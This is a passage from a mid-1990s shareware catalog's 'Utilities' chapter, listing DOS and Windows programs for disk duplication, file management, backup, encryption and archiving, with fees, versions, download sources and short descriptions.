normal DOS disks. + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 115. + + Product: PDEL + Safe/Precise DOS delete. Extensive features. See full + description on page 17. + + Product: PS-SLEEVE + PostScript floppy storage sleeve printer. See full description + on page 93. + + Product: WinUpD8R + Author: , 719-531-0403 + Version: 4.1 (03-12-95) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $29.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of fax, CompuServe, mail support; lifetime return + policy; bonus utilities; disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: UPD8R_41.ZIP on BBSs (call 703-680-9269 to download it + at no charge); UPD8R.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance); + + Chapter 2, "Utilities" 25 + + + + UPD8R_41.ZIP on GEnie in WINDOWS RT forum LIBrary 11 (or + contact userID NA for assistance). + Download size: 281k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + If you use "floppy net" to move files back and forth between + computers, you need WinUpD8R! It can automatically keep your + files up-to-date on multiple machines while providing triple- + redundant backup of your data in the process. Many available + modes, including batch operation. No cables or modem transfers + necessary. + + + 2.1.3.1 Disk duplicating + + Product: Master Disk + Author: , 805-541-0910 + Version: 2.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $179.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; all ASP-wide offers (see + page 5). + Look for: MASTER20.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 73k (about six minutes with a 2400 baud modem) + Description: + Prepares floppy diskettes used as masters for software + duplication and distribution. Software duplicated from these + originals are more reliable and resistant to virus + contamination. It examines the diskette and drive for flaws and + errors, and verifies the quality and integrity as being + suitable for use as the original master, fills unused sectors + and boot tracks with special security code. Documentation + includes extensive anti-virus test data. + + Chapter 2, "Utilities" 26 + + + + Product: SAB Diskette Utility + Author: + Version: 2.50 (01-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $7.50 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 6-month free + upgrading allowed. + Look for: SABDU250.ZIP on BBSs; SDU250.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 76366,1664 for + assistance). + SWREG#: 1256 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + The Windows diskette utility. Using disk drives under Windows + is easy & efficient when you can: + * Format/copy/compare/save floppy diskette images in + foreground or background + * Read a diskette once and make multiple copies + * Save images to hard drive + * Convert diskette image formats while preserving boot and + reserve sectors + * Create distribution sets with group restores + * Browse diskettes and saved diskette images + Includes extensive online help + + + 2.1.3.2 Disk formatting + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 25. + + 2.1.4 Directory utilities + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 38. + + Product: ACZAR for Windows + Windows archive/compression shell. See full description on + page 39. + + Chapter 2, "Utilities" 27 + + + + Product: SuperDIR + Author: , 913-663-3022 + Version: 1.1 (08-20-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; lifetime limited return policy; royalty-free source + code; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; SUPDIR.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 2 (or contact userID 75264,1630 for + assistance). + SWREG#: 5329 + PsL#: 11950 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A DIR-type utility with include/exclude filters. Also formats + for DB import, multiple include and exclude file and directory + masks, many sorting, filtering, and output options, can sort + ALL files in tree (not just within each subdirectory). Comma, + tab, and space delimited output can be piped to a file or to a + DOS program. (For example, pipe all .BAK files to a utility to + delete them.) Source is royalty-free object-based C++. + + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 121. + + + 2.2 File utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 97. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 97. + + Chapter 2, "Utilities" 28 + + + + Product: 4FILES + Author: , 907-747-8996 + Version: 3.23 (08-25-95) + Needs: IBM PC, DOS 3.0 or better. 128k RAM. + Strongly recommended: 4DOS or NDOS. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + GEnie, mail support; 1-month return policy; bonus utilities; + all ASP-wide offers (see page 5); disks of other shareware; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: 4FILE323.ZIP on BBSs (call 718-837-3236 to download it + at no charge). + PsL#: 10574 + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + System enhancer & file manager makes all of your work easier! + * Combines fast directory navigation with finger-tip + launching & loading of your data files & utilities + * File management functions & archiving support 4DOS/NDOS + file descriptions + * Works from a sortable directory listing that shows and + edits file descriptions + * Runs well with DOS, OS/2, Windows & DESQview + * Easy on-the-fly configuration & registration branding + * Recommended by 9/94 PC Computing magazine + + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 98. + + Product: ComeBack + Author: , 203-651-6170 + Version: 3.0 (01-06-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; CGA monitor; + Hercules monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Can recover files that were deleted or even overwritten. It + can recover files even after you have written over the + directory entry. Easy to use. No searching through sectors. + Mouse/Hot key user interface makes recovering files a snap. + Works on all size hard drives. Over 40,000 registered users of + this product swear by it! + + Chapter 2, "Utilities" 29 + + + + Product: CommEx + Common dialog extensions for Windows 3.1/3.11. See full + description on page 176. + + Product: DizView + Author: , 314-861-1500 + Version: 2.0 (06-09-95) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited fax, BBS, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: DIZVUE20.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DIZVUE.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 11790 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Catalog all your ZIP files! Ever wonder just what all those + ZIP files were? Now you can look at them without opening every + one of them manually. This will gather all of the FILE_ID.DIZ + files from your archives in a directory and put them in menu to + view by files or by subdirectory. Now you can catalog all of + your directories, edit each description and resave it to the + catalog and your ZIP file. Sysops!! Now create a custom + FILES.BBS file for your BBS. + + + Product: DO + Author: , 702-827-4682 + Version: 4.3 (01-01-95) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; bonus utilities; bonus data. + Lifetime free upgrading allowed. + Look for: DO.ZIP on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A text/binary file utility. Find, replace; sort FAST; tag lines + within range; cut columns; Mac/UNIX/DOS; glue 2 files side-by- + side; merge sorted files; remove blank &/or duplicate lines; + paragraphs from lines or converse; expand tabs; filter by high + bits, number, letter, control characters, numbers, other; + insert strings at a given column; produce upper/lower/mixed + case; remove/compress white space; more. Supports redirection. + Includes PEEK, PSORT. + + Chapter 2, "Utilities" 30 + + + + Product: Double Directory + Author: , 717-289-4019 + Version: 1.40 (06-01-93) + Needs: IBM PC, DOS 2.0 or better. 272k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $15.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus utilities; disks + of other shareware. + Look for: DBLDIR14.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + A file and disk manager that displays 2 directories side-by- + side. Scroll through both simultaneously. Compare them & tag + the differences. Copy, move, rename, delete, view, print and + change attributes of files. Sort, make, mask, and remove + directories. Shell to DOS or shell and run a program (w/ or w/o + Double Directory removed from memory). 25-, 43-, and 50-row + modes. Many configuration options. Point and shoot interface + and mnemonic commands. Context-sensitive help. + + + Product: File Finder for Windows + Powerful file finder for Windows 3.1. See full description on + page 177. + + Product: File Finder/Grouper + Author: , 703-548-6869 + Version: 2.02 (04-16-95) + Needs: IBM PC, DOS 3.3 or better. 180k RAM. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; 1-month return policy; bonus data; all ASP-wide + offers (see page 5); disks of other shareware; registration + commissions. 24-month free upgrading allowed. + Look for: availability unknown on BBSs; FFG.ZIP on CompuServe in + CIS:PCSYS forum LIBrary 6 (or contact userID 71674,1747 for + assistance). + SWREG#: 1558 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + The best file finder! Use multiple date/time/size/day-of-week + ranges, attrib., text as criteria to find or exclude files and + group them for subsequent processing. Search ZIP/ARC/LZH/ARJ/ + ZOO. All or specified drives. Use *abc* wild cards. Create + database of files. Execute files or arbitrary DOS command for + each. Use relative date/time. Output is user configurable. + + Chapter 2, "Utilities" 31 + + + + Product: FILE_HANDLE File Management [***] + Management program for DOS, Windows and LANs. See full + description on page 158. + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 115. + + Product: MicroFox DOS Utilities + Author: , 216-659-9489 + Version: 1.14 (05-05-95) + Needs: IBM PC, DOS 1.0 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$10.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 5); disks of + other shareware; discounts on other products. + Look for: UTL114.ZIP on BBSs (call 216-661-9065 to download it at + no charge); UTL114.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 0 (or contact userID 73057,3113 for assistance); + UTL114.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + MicroFox Utilites for DOS. Printer utilities. Batch file + utilities. Screen utilities. File utilities. + + + Product: PATTR + Author: , 909-352-2820 + Version: 1.5 (11-05-90) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $19.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PATTR15.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PATTR.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Sets DOS attributes for one or more files. Can process one or + more directories with a single command and advanced file + selection capabilities are provided. It is commonly used to + set or reset the DOS archive flag to cause or prevent files + from being processed by your favorite backup utility. + + Chapter 2, "Utilities" 32 + + + + Product: Super Stuff Utilities + Windows based utilities that enhance Windows. See full + description on page 166. + + 2.2.1 Backup/restore + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 38. + + Product: ACZAR for Windows + Windows archive/compression shell. See full description on + page 39. + + Product: BakupWiz + Author: , 619-259-9797 + Version: 3.29fl (01-03-92) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $59.00 (add $5.00 for shipping to Canadian + addresses) (add $7.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy. 3-month free upgrading allowed. + Look for: BWIZ.ZIP on BBSs (call 619-481-6479 to download it at + no charge); BWIZ.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 70216,174 for assistance). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + Quick & reliable: speeds greater than 2 megabytes per minute. + Flexible: back up all files, any files you select, or any + changed files. Network support: NetWare 286 and 386 including + Apple File Protocol are supported. Directory and file access + privileges and binderies are backed up while users are still + logged onto the system. Secure: uses a password system to + shield your data. Easy to use: pull-down menus, helplines, and + message windows. + + + Product: COMpanion + DOS personal network for up to 5 PCs. See full description on + page 376. + + Product: Crush + Create much smaller archives than PKZIP! See full description + on page 40. + + Chapter 2, "Utilities" 33 + + + + Product: Easy Backup + Author: , 01625-614669 + Version: 4.5 (06-15-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; EBAK.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 100410,717 for + assistance). + SWREG#: 3044 + PsL#: 11492 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + A no-frills compressed backup system. It backs up a single + directory (and any sub directories). There are no wildcard or + date stamp options. Perfect for anyone who regularly backs up + complete directory structures. Previous settings are stored in + a data file so that subsequent backups are simply selected from + a list. + + + Product: FSave + Author: , 716-293-3241 + Version: 1.1 (03-15-95) + Needs: IBM AT (80286), DOS 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + Hard disk. PKZIP or other compression/archiving program. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, mail support; bonus utilities; disks of other + shareware; discounts on upgrades; registration commissions. 1 + free update disk(s) sent out. + Look for: FSAVE11.ZIP on BBSs; FSAVE1.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 74034,1441 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Simplifies the task of saving files on your PC. You specify + which files on your PC can be recovered from other sources + (original media, BBSs, distribution diskettes, etc.). This + need only be done once. Then FSave only backs up the files + which cannot be gotten elsewhere. This makes your periodic + filesaves small, fast and easy. No special hardware (e.g. tape + drive) is needed. I regularly back up my 170 mb disk onto a + single 1.44 floppy. + + Chapter 2, "Utilities" 34 + + + + Product: GetBack + Author: , 203-651-6170 + Version: 2.4 (12-24-92) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, mail support; 3-month return policy; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GTBK22.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 72077,437 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A full featured GUI backup and restore utility (a text based + interface is also present for slower machines). Can backup up + to four megabytes per minute. Many outstanding features + including extensive online help, mouse support, file + compression, batch mode operation, point and click directory + tree selection, full, incremental and differential backups, and + multiple drive support. Formats floppies as needed or on + demand. Supports all DOS based networks. Multiple user + configurations available. + + + Product: Mass-Store Copy + Author: , 202-675-4528 + Version: 2.6 (04-01-91) + Needs: IBM PC, DOS 3.1 or better. Hard disk; one removable disk + drive. + Registration fee: $59.00 + Registration benefits: Printed Manual with disk; one year of + Phone/FAX/mail/Email/BBS support;Certificate for $7 off a + subscription to Shareware Magazine; free CompuServe Membership. + Look for: MSCOPY??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); MSC??.ZIP on CompuServe in CIS:PCHW forum + LIBrary 1 (or contact userID 74777,3004 for assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + "Make copies of optical disks while using only one optical + drive!" Make backup copies of: + * Bernoulli Box disks + * Erasable Optical + * "Super Floppies" + * WORM Disks + * Removable/Portable hard drives + Backup copies of disks can be made while using only one + removable disk drive (No need to buy a second drive.). Copies + any size removable DOS disk, regardless of the available hard + disk space. Files larger than your hard drive can be copied. + + Chapter 2, "Utilities" 35 + + + + Product: MegaBack Hard Disk Backup + Author: , 909-352-2820 + Version: 2.3 (04-27-93) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 3 months of BBS support; + 1-month return policy; bonus utilities; discounts on upgrades. + Look for: MBACK230.ZIP on BBSs (call 909-352-2825 to download it + at no charge); MBACK.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + MBACK23.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Provides painless backup. Professional features, yet easy to + use. Better than DOS 6 backup in several ways - the most + important being its storing of all backup data on one set of + sequentially numbered backup diskettes. Features: Diskette + formatting; file select/exclude; compression; spans files + across disks; multiple hard disks; appends incremental to full + backups; backup index; selective restore; menus; command line; + utilities; error recovery and more! + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 156. + + Product: PCOPY + The copy program "that DOS forgot" See full description on + page 16. + + Product: QIC-BAT for CMS + Author: , 970-667-4566 + Version: 1.2 (11-08-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. Colorado Memory Systems + backup software. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + + Chapter 2, "Utilities" 36 + + + + (see page 5). 12-month free upgrading allowed. Windows version + of QIC-BAT. + Look for: QICBAT12.ZIP on BBSs (call 970-663-5507 to download it + at no charge); QICBAT.ZIP on CompuServe in CIS:PCHW forum + LIBrary 17 (or contact userID 72673,357 for assistance). + SWREG#: 1067 + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + This backup utility for Colorado tape drives unleashes the + power of your CMS tape backup software by providing access to + features not available using CMS's menu software. Creates + error-free backup batch files with just a few clicks of the + mouse. Multi-drive backups, mouse support, tag file generator, + on-line help, group drives and verification reports. + + + Product: Rosenthal UnInstall + Author: , 805-541-0910 + Version: 1.0 (04-25-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $19.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $4.75 (Canadian + dollars) for shipping to Canadian addresses) (add $5.50 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; LAN license; site license; + all ASP-wide offers (see page 5); disks of other shareware. + Look for: UNSTAL01.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Automatically remove unwanted Windows & DOS programs, files, + directories and restore changes made to AUTOEXEC.BAT, + CONFIG.SYS, WIN.INI, SYSTEM.INI. Run it before you add anything + new to your system. At your option, changes can be kept, or + deleted, and the system completely returned to normal. + Safeguards provide display of all directories and files + (including hidden ones) for review and confirmation. This is an + absolute necessity for trying shareware. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 18. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 392. + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 24. + + Chapter 2, "Utilities" 37 + + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 47. + + 2.2.2 File encryption + + See also: Utilities, Security programs. + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 162. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 172. + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 158. + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 168. + + Product: FreeForm + Ultimate floppy disk formatting program. See full description + on page 23. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 377. + + Product: Puffer + Author: + Version: 1.0 (05-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM. + Registration fee: $20.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 5). 160-bit encryption + key enabled in registered version. + Look for: PUFF10.ZIP on BBSs; PUFF10.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 72124,3234 for + assistance). + PsL#: 14046 + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + A password-based data file and e-mail encryption utility for + Windows. Keep your personal, business, and electronic + transmitted data private. Uses the highly rated Blowfish + algorithm for fast, secure encryption and the Secure Hash + Algorithm (SHA) for key generation. Three output formats are + + Chapter 2, "Utilities" 38 + + + + supported including binary, self-extracting executables, and + 7-bit text for Internet e-mail. Also includes a three-pass, + secure file wipe feature. + + + Product: Safe Program + Author: , 510-806-0713 + Version: 1.00 (07-01-95) + Needs: IBM PC, Windows 3.0 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $40.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 1 months of + phone, CompuServe, mail support; 1-month limited return policy; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; SAFEPR.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 73220,324 + for assistance). + SWREG#: 4936 + PsL#: 14106 + Download size: 308k (about 23 minutes with a 2400 baud modem) + Description: + Lock your files in a software safe and set the combination. + Mail the safe using any form of electronic mail. Anyone + receiving the file sees a closed safe, but can only access its + contents if they know the combinatoin. Accepts all types of + data from disk files, clipboard cut and paste, drag and drop, + OLE, etc. Visual and audio feedback in the user interface. + Windows 3.1 users may need to also install OLE 2.0 files. + + + Product: Zip Pro + Full Zip/UnZip support for Windows 3.1. See full description + on page 46. + + 2.2.3 File archiving & compression + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 181. + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 101. + + Chapter 2, "Utilities" 39 + + + + Product: ACZAR for DOS + Author: , 915-595-8787 + Version: 2.10 (10-23-93) + Needs: IBM AT (80286), DOS 3.2 or better. 527k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. 1 free + update disk(s) sent out. + Look for: ACZAR210.ZIP on BBSs (call 915-595-8705 to download it + at no charge); ACZAR2.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 71031,3614 for assistance). + SWREG#: 420 + PsL#: 10939 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Compare with SHEZ or ARCMASTER and see what you have been + missing. Very easy to use, but powerful! Mouse support, SAA/GUI + Interface, supports ZIP, ARJ, LZH, PAK, ARC, ZOO, SQZ, HYP, + ARCE, ARC128, ARC286, all SFX files, SCAN, built-in file viewer + + editor, revolu- tionary Drag & Drop functions, Backup/Restore + entire drives/directories using ZIP or ARJ, and much more! + + + Product: ACZAR for Windows + Author: , 915-595-8787 + Version: 3.10 (09-07-95) + Needs: IBM PC, Windows 3.0 or better. 527k RAM; EGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 1 free update disk(s) sent + out. + Look for: ACZAW310.ZIP on BBSs (call 915-595-8705 to download it + at no charge); ACZAW3.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 71031,3614 for assistance). + SWREG#: 2107 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Beats WinZip by far!!! Built-in ZIP and UNZIP comp. with + v2.04g, built-in multi-volume! Supports ZIP,ARJ,LZH,PAK, + ARC,ZOO,SQZ,HYP,ARCE,all SFX, McAfee's SCAN,DIET,PKLITE,LZEXE, + Drag & Drop,3-d interface, Backup/Restore entire drives or + directories using multi-volume ZIP or ARJ, view archives within + archives unlimited levels deep, and much more... + + Chapter 2, "Utilities" 40 + + + + Product: ARCHIVE TRACKER + Author: , 301-490-7104 + Version: 1.0 (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 275k RAM; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month return policy; discounts on upgrades. 1 free + update disk(s) sent out. + Look for: ACTR10.ZIP on BBSs; ACTR10.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 100014,2347 for + assistance). + Download size: 271k (about 20 minutes with a 2400 baud modem) + Description: + Consists of a recommended file archiving system and the + implementing software that keeps track of the archived computer + files. Software reads archive directories and stores file data + in database that can be searched to locate specified files. + + + Product: Crush + Author: , +44-81-203-3731 + Version: v1.3 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 80k RAM. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: CRUSH.ZIP on BBSs; CRUSH.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (or contact userID 100031,3537 for + assistance); CRUSH.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 2870 + PsL#: 11363 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Super-compressor for DOS. Fed up with limited compression + performance of Stacker, PKZIP (2.04g), UC2, ZOO, ARJ and LHA? + This will usually give 5%-50% improved compression over any + other DOS compression tool, & yet allows the user to continue + using the archiver already in use. Fast & the ideal choice for + users keen to save disk space. Too good to be true? No! Try it! + PocketD v4.1 compatible. + + Chapter 2, "Utilities" 41 + + + + Product: Drag And Zip + Author: , 415-382-7999 + Version: 2.41 (06-22-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor. + PKZIP/PKUNZIP. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGZP.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Makes any file manager that supports Drag and Drop into a Zip + file manager. Drag files to a zipper icon and run PKZIP on + them. Double click on a Zip file in file manager and a window + with the Zip file listing pops up. Tag files for extraction or + deletion. Run the associated program on a file. View the file + with the built in ASCII viewer. Drag and drop directories. + Fileman Launcher installs into File Manager and runs DZ with + it. When you quit file manager, DZ automatically quits too. + + + Product: E-report + Paperless management reports, COLD. See full description on + page 53. + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 158. + + Product: INFOMANIA + Indexes text files/finds offline text quickly. See full + description on page 11. + + Chapter 2, "Utilities" 42 + + + + Product: JRchive + Author: , 416-751-5678 + Version: 1.02 (11-01-93) + Needs: IBM PC, DOS 2.1 or better. 